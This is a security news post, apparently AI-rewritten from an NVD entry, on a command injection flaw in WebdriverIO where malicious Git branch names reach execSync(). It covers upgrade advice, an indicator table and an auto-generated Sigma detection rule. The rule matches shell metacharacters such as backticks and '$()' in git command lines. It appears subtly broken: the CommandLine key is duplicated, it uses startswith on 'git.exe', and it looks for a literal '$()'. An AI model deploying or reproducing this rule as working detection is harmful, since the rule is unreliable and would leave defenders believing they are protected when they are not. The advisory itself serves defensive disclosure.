CVE-2026-25244: WebdriverIO RCE via Malicious Git Branch Names
The National Vulnerability Database has published details on CVE-2026-25244, a critical command injection vulnerability in WebdriverIO versions below 9.24.0. This flaw enables remote code execution (RCE) during test orchestration.
The vulnerability stems from WebdriverIO’s getGitMetadataForAISelection() function, which directly interpolates Git branch names containing shell metacharacters into execSync() calls without proper sanitization. Attackers can exploit this by supplying a malicious repository whose branch name carries an arbitrary code payload. This executes on CI/CD servers and developer machines.
The implications are severe: credential and secret disclosure, source code and SSH key exfiltration, system compromise, and potential supply chain attacks via tampered build artifacts. The National Vulnerability Database confirms the issue has been fixed in WebdriverIO version 9.24.0, urging immediate updates for all affected deployments.
What This Means For You
- If your organization uses WebdriverIO, specifically in CI/CD pipelines or on developer machines, you are exposed to critical RCE via CVE-2026-25244. Immediately upgrade to version 9.24.0 or newer. Audit your CI/CD logs for any unusual Git repository fetches or `execSync()` calls that could indicate exploitation.
Related ATT&CK Techniques
🛡️ Detection Rules
3 rules · 6 SIEM formats3 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free — export to any SIEM format via the Intel Bot.
CVE-2026-25244: WebdriverIO Malicious Git Branch Name Command Injection
title: CVE-2026-25244: WebdriverIO Malicious Git Branch Name Command Injection
id: scw-2026-05-18-ai-1
status: experimental
level: critical
description: |
Detects the use of git commands with branch names containing shell metacharacters (like backticks or $()) which are then interpolated into execSync calls by vulnerable WebdriverIO versions (below 9.24.0). This is a direct indicator of the CVE-2026-25244 command injection vulnerability.
author: SCW Feed Engine (AI-generated)
date: 2026-05-18
references:
- https://shimiscyberworld.com/posts/nvd-CVE-2026-25244/
tags:
- attack.execution
- attack.t1059.004
logsource:
category: process_creation
detection:
selection:
Image|startswith:
- 'git.exe'
CommandLine|contains:
- 'branch'
- '--format=%(refname:short)'
CommandLine|contains:
- '`'
- '$()'
condition: selection
falsepositives:
- Legitimate administrative activity
Source: Shimi's Cyber World · License & reuse
Indicators of Compromise
| ID | Type | Indicator |
|---|---|---|
| CVE-2026-25244 | RCE | WebdriverIO versions < 9.24.0 |
| CVE-2026-25244 | Command Injection | WebdriverIO function getGitMetadataForAISelection() using execSync() with unsanitized Git branch names |
| CVE-2026-25244 | RCE | Exploitation via malicious Git repository branch name in testOrchestrationOptions.runSmartSelection.source |
Written by SCW Vulnerability Desk
Source & Attribution
| Source Platform | NVD |
| Channel | National Vulnerability Database |
| Published | May 19, 2026 at 00:16 UTC |
This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.
Believe this infringes your rights? Submit a takedown request.
Related coverage
CVE-2026-20240 — Denial of Service
CVE-2026-20240 — In Splunk Enterprise versions below 10.2.2, 10.0.5, 9.4.11, and 9.3.12, and Splunk Cloud Platform versions below 10.4.2603.1, 10.3.2512.9, 10.2.2510.11, 10.1.2507.21, 10.0.2503.13, and 9.3.2411.129,...
Splunk Enterprise, Cloud Vulnerability Exposes Session Cookies, Sensitive Data
CVE-2026-20239 — In Splunk Enterprise versions below 10.2.2 and 10.0.5, and Splunk Cloud Platform versions below 10.3.2512.8, 10.2.2510.11, 10.1.2507.21, and 10.0.2503.13, a user with a...
CVE-2026-20238 — In Splunk AI Toolkit versions below 5.7.3, a low-privileged
CVE-2026-20238 — In Splunk AI Toolkit versions below 5.7.3, a low-privileged user that does not hold the 'admin' or 'power' roles could access confidential data...